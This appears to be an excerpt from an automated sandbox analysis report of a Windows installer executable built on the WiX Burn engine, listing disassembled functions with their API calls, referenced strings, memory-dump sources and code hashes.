                                                                                                                                                                                                                                                                                                  • UX requested unknown approved exe with id: %ls, xrefs: 005DF0CE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1367039788-528931743
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ff51625bcf41963b9675f16d553a4286b74768e288b6a3580f004abb2b941c7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3987def79cd3ecfac0a70269a495e5e44d4492a6817e36ac43624797cec5b989
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff51625bcf41963b9675f16d553a4286b74768e288b6a3580f004abb2b941c7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31B332A41226EFDB219FA8DC09E5B7BA9BF04720B058567BD06EB351E731DD00C7A0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 005C6062
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 005C6076
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C6088
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 005C60DC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C60E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 005C6124
                                                                                                                                                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 005C60C4
                                                                                                                                                                                                                                                                                                  • Failed to get the Date., xrefs: 005C610B
                                                                                                                                                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 005C60AD
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 005C60A3, 005C6101
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600523: EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600533
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600523: LeaveCriticalSection.KERNEL32(0062B5FC,?,?,0062B5F4,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 0060067A
                                                                                                                                                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 005D4212
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 005D421E
                                                                                                                                                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,006139D4,00000000), ref: 005D426B
                                                                                                                                                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 005D4272
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1844635321-1389066741
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy source path., xrefs: 005DA31A
                                                                                                                                                                                                                                                                                                  • Failed to get bundle layout directory property., xrefs: 005DA287
                                                                                                                                                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 005DA1A1
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 005DA1B7
                                                                                                                                                                                                                                                                                                  • Failed to combine last source with source., xrefs: 005DA210
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 005DA26C
                                                                                                                                                                                                                                                                                                  • Failed to get current process directory., xrefs: 005DA1F3
                                                                                                                                                                                                                                                                                                  • Failed to combine layout source with source., xrefs: 005DA2A4
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 2767606509-3003062821
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 005C30C1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C30C7
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 005C3121
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3127
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C31DB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C31E5
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C323B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3245
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1547313835-741606033
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0060B500), ref: 005D50D3
                                                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 005D5171
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 005D518A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                                                                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2d433b448fe655caa9927242331f14dc455fa9e4f0c3e4b37d73aadb8b60a773
                                                                                                                                                                                                                                                                                                  • Instruction ID: dff630c850195ff945090714599140795640c1dc7ac7ee7cc93f3609f1041f89
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d433b448fe655caa9927242331f14dc455fa9e4f0c3e4b37d73aadb8b60a773
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A215971940619BFDF219FD8C841AAEBBBAFB08350B10816AF811A2211E7319E50DB90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1186
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1191
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005C119F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11BA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005C11C2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11D7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                                                                                                                                                  • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                                                                                  • API String ID: 3104334766-1824683568
                                                                                                                                                                                                                                                                                                  • Opcode ID: f8baa082b0a849b298cea98afabadb0ec5f2b0cf659ef83e9747a2f8d349d500
                                                                                                                                                                                                                                                                                                  • Instruction ID: 24050bed4cd708fcc3db0277c153b3d8273c8d47f4560be0c94e0d610c89856f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8baa082b0a849b298cea98afabadb0ec5f2b0cf659ef83e9747a2f8d349d500
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7901DE3128061ABEC7116FE29C09E6F7F1DFB427A0B04E019BA1692141EB749A00CAA4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,005DAD40,?,00000000,00000000), ref: 005DD2E9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005DD2F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,005DD365,00000000,?,?,005DC7C9,00000001,?,?,?,?,?), ref: 005DCF37
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005DCF25: GetLastError.KERNEL32(?,?,005DD365,00000000,?,?,005DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 005DCF41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,005DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 005DD376
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QE\$elevation.cpp$fT\
                                                                                                                                                                                                                                                                                                  • API String ID: 3606931770-3685454459
                                                                                                                                                                                                                                                                                                  • Opcode ID: 293084f2a6b59b613e2b70ed345fff510de02e060f31a5ba3b51265f1216ebfd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43ebe5b934565691f514605d32b81b2fb7fc0749aeed001675be2dfbc67e0acb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293084f2a6b59b613e2b70ed345fff510de02e060f31a5ba3b51265f1216ebfd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D54105B6D45219AFCB14DFA9D8859DEBBF9FF48310F10412AF904E7340E770A9408BA4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,005D9F04,00000003,000007D0,00000003,?,000007D0), ref: 005D90B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 005D90BF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,005D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 005D9187
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 005D9103
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 005D914E
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 005D90F6
                                                                                                                                                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 005D912F
                                                                                                                                                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 005D9172
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 005C7210
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format escape sequence., xrefs: 005C72AA
                                                                                                                                                                                                                                                                                                  • Failed to append characters., xrefs: 005C729C
                                                                                                                                                                                                                                                                                                  • [\%c], xrefs: 005C726F
                                                                                                                                                                                                                                                                                                  • Failed to append escape sequence., xrefs: 005C72A3
                                                                                                                                                                                                                                                                                                  • []{}, xrefs: 005C723A
                                                                                                                                                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 005C7227
                                                                                                                                                                                                                                                                                                  • Failed to copy string., xrefs: 005C72C4
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001), ref: 00604203
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000002,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00604212
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001), ref: 006042A6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001,000007D0,00000001), ref: 006042B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindFirstFileW.KERNEL32(005E923A,?,00000100,00000000,00000000), ref: 0060447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindClose.KERNEL32(00000000), ref: 00604487
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,005D0654,00000001,00000001,00000001,005D0654,00000000), ref: 005CF07D
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,005D0654,00000001,00000001,00000001,005D0654,00000000,00000001,00000000,?,005D0654,00000001), ref: 005CF09A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 005CF0C7
                                                                                                                                                                                                                                                                                                  • PackageVersion, xrefs: 005CF05E
                                                                                                                                                                                                                                                                                                  • Failed to format key for update registration., xrefs: 005CF033
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,005C4DBC,00000000,?,?,00000000,?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?), ref: 00604033
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00604041
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,005C4DBC,00000000,005C4DBC,00000000,?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001), ref: 006040AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 006040B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5d239e2e1691dabbe7a627893daab69d2d6761d957d98ff7402f70394d56384
                                                                                                                                                                                                                                                                                                  • Instruction ID: ab213596a065fdbbc692d20e0c1f32171a0fd5f8503538680bad0cb9f4d93999
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5d239e2e1691dabbe7a627893daab69d2d6761d957d98ff7402f70394d56384
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC2107F66C233697DB340B964C80BBB669AEF10B60B154135FF06FB691EF618C4082E4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005ED2EE
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 005ED31C
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 005ED325
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 944053411-3611226795
                                                                                                                                                                                                                                                                                                  • Opcode ID: f93f9aaaf180f1b71b86f4fcbadbac0f0238642bcf70a0f05ffc23a66eb45705
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0acde3e69d868df02ce18cb49aea5a00535ed501b7916abfa101b5936636ed44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f93f9aaaf180f1b71b86f4fcbadbac0f0238642bcf70a0f05ffc23a66eb45705
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321B5B460074AFFDB149F68D844A59BBF6FF48320F10C669F964A7352C771AD508BA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindFirstFileW.KERNEL32(005E923A,?,00000100,00000000,00000000), ref: 0060447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindClose.KERNEL32(00000000), ref: 00604487
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(005E923A,00000080,00000000,005E923A,000000FF,00000000,?,?,005E923A), ref: 00604182
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005E923A), ref: 0060418C
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(005E923A,00000000,005E923A,000000FF,00000000,?,?,005E923A), ref: 006041AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005E923A), ref: 006041B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e6fd62b030a4e2d02891193cbe69d6ea27a22b69b909a70bdf07db7c80727c9
